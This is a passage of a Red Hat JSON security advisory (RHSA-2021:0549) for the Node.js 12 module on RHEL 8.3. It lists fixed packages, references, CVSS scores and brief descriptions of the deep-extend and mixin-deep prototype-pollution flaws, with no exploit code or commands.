"AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2018-3750" }, { "category": "external", "summary": "RHBZ#1578246", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1578246" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2018-3750", "url": "https://www.cve.org/CVERecord?id=CVE-2018-3750" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2018-3750", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-3750" }, { "category": "external", "summary": "https://hackerone.com/reports/311333", "url": "https://hackerone.com/reports/311333" }, { "category": "external", "summary": "https://nodesecurity.io/advisories/612", "url": "https://nodesecurity.io/advisories/612" } ], "release_date": "2018-04-18T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:52+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0549" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L", "version": "3.0" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-deep-extend: Prototype pollution can allow attackers to modify object properties" }, { "cve": "CVE-2019-10746", "cwe": { "id": "CWE-471", "name": "Modification of Assumed-Immutable Data (MAID)" }, "discovery_date": "2019-08-24T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1795475" } ], "notes": [ { "category": "description", "text": "A flaw was found in Nodejs\u0027s mixin-deep prior to versions 1.3.2 and 2.0.0. The mixin-deep function could be used to add or modify properties of the Object.prototype. The highest threat from this vulnerability is to system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-mixin-deep: prototype pollution in function mixin-deep", "title": "Vulnerability summary" }, { "category": "other", "text": "In Red Hat Software Collections and Red Hat Enterprise Linux 8, nodejs-mixin-deep is bundled into nodejs-nodemon, and is not meant to be accessed outside of that package. Within nodemon, this flaw is rated with a Low severity.\n\nIn Red Hat OpenShift Logging the openshift-logging/kibana6-rhel8 container bundles many nodejs packages as a build time dependencies, including the mixin-deep package. \nThe vulnerable code is not used hence the impact to OpenShift Logging by this vulnerability is Low.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2019-10746" }, { "category": "external", "summary": "RHBZ#1795475", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1795475" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2019-10746", "url": "https://www.cve.org/CVERecord?id=CVE-2019-10746" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-10746", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10746" } ], "release_date": "2019-06-19T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:52+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0549" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.0, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:12:8030020210129141730:229f0a1c:nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.x86_64", 